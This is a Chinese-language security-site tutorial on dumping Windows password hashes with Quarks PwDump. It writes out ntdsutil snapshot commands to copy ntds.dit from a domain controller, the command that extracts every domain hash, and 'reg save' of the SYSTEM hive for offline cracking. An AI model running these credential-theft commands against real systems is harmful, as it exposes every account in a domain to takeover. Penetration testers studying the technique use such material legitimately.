攻防实战:使用Quarks PwDump获取域控密码-华盟网

攻防实战:使用Quarks PwDump获取域控密码

华盟学院山东省第二期线下学习计划

   

       工具源代码下载地址:https://codeload.github.com/quarkslab/quarkspwdump/zip/master

  它目前可以导出 :

  – Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录– Domain accounts NT/LM hashes + history 域中的NT/LM哈希+历史登录记录– Cached domain password 缓存中的域管理密码– Bitlocker recovery information (recovery passwords & key packages) 使用Bitlocker的恢复后遗留的信息。

  1.使用Quarks PwDump本地帐号的哈希值

  Quarks PwDump必须在Dos命令提示符下运行,直接运行QuarksPwDumpv0.2b.exe,如图1所示,默认显示帮助信息,其参数含义如下:

  -dhl 导出本地哈希值-dhdc导出内存中的域控哈希值-dhd 导出域控哈希值,必须指定NTDS文件-db 导出Bitlocker信息,必须指定NTDS文件-nt 导出ntds文件-hist 导出历史信息,可选项-t 导出类型可选默认导出为John类型。-o 导出文件到本地

      攻防实战:使用Quarks PwDump获取域控密码 

      图1使用Quarks PwDump本地帐号的哈希值

  2.使用Quarks PwDump导出账号实例

  使用命令“QuarksPwDumpv0.2b.exe -dhl -o 1.txt”将导出本地哈希值到当前目录的1.txt,执行命令会显示导出帐号的数量,如图2所示。显示有3个帐号导出到1.txt,打开1.txt可以看到导出哈希值的具体帐号和值。

      攻防实战:使用Quarks PwDump获取域控密码 

      图2导出本地帐号到文件

  3.配合ntdsutil工具导出域控密码

  Ntdsutil.exe是一个为 Active Directory 提供管理设施的命令行工具。可使用Ntdsutil.exe 执行Active Directory的数据库维护,管理和控制单个主机操作,创建应用程序目录分区,以及删除由未使用Active Directory安装向导 (DCPromo.exe)成功降级的域控制器留下的元数据。Ntdsutil还可以用来获取域控数据库ntds.dit文件,具体命令如下:

  (1)创建快照

  ntdsutil snapshot "activate instance ntds" create quit quit

  (2)Ntdsutil挂载活动目录的快照

  ntdsutil snapshot "mount {GUID}" quit quit

  {GUID}为动态获取的,如图3所示。

  (3)复制快照的本地磁盘

  copy MOUNT_POINT/windows/NTDS/ntds.dit c:/ntds.dit

  (4)卸载快照

  ntdsutil snapshot "unmount {GUID}" quit quit

  (5)删除快照

  ntdsutil snapshot "delete {GUID}" quit quit

      攻防实战:使用Quarks PwDump获取域控密码 

      图3导出快照文件

  使用命令“QuarksPwDump.exe --dump-hash-domain --ntds-file c:/ntds.dit”将导出的ntds.dit文件中哈希值全面导出。一个完整的实例如下:

  tdsutil snapshot "activate instance ntds" create quit quitntdsutil snapshot "mount {a0455f6c-40c3-4b56-80a0-80261471522c}" quit quit快照 {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827} 已掛接为 C:/$SNAP_201212082315_VOLUMEC$/copy C:/$SNAP_201212082315_VOLUMEC$/windows/NTDS/ntds.dit c:/ntds.ditntdsutil snapshot "unmount {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quitntdsutil snapshot "delete {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quitQuarksPwDump.exe --dump-hash-domain --ntds-file c:/ntds.dit

  说明:获取哈希值最好都在同一台服务器上执行,也即将QuarksPwDump.exe直接放在导出ntds.dit服务器上,执行导出命令。如果仅仅将ntds.dit复制后下载本地可能会出现无法读取错误。网上也曾经出现一个NTDS.dit密码快速提取工具ntdsdump,读者可以自己进行测试。如果是想下载ntds.dit到本地恢复还需要执行“reg save hklm/system system.hive”,将system.hive和ntds.dit全部复制到本地进行域控密码获取。

  参考资料

  1. Quarks PwDump,http://blog.quarkslab.com/quarks-pwdump.html

  2. NTDS.dit密码快速提取工具,http://www.secpulse.com/archives/6301.html

www.idc126.com

原文地址:https://hack.77169.com/201602/224545.shtm

本文由 华盟网 作者:怪狗 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

发表评论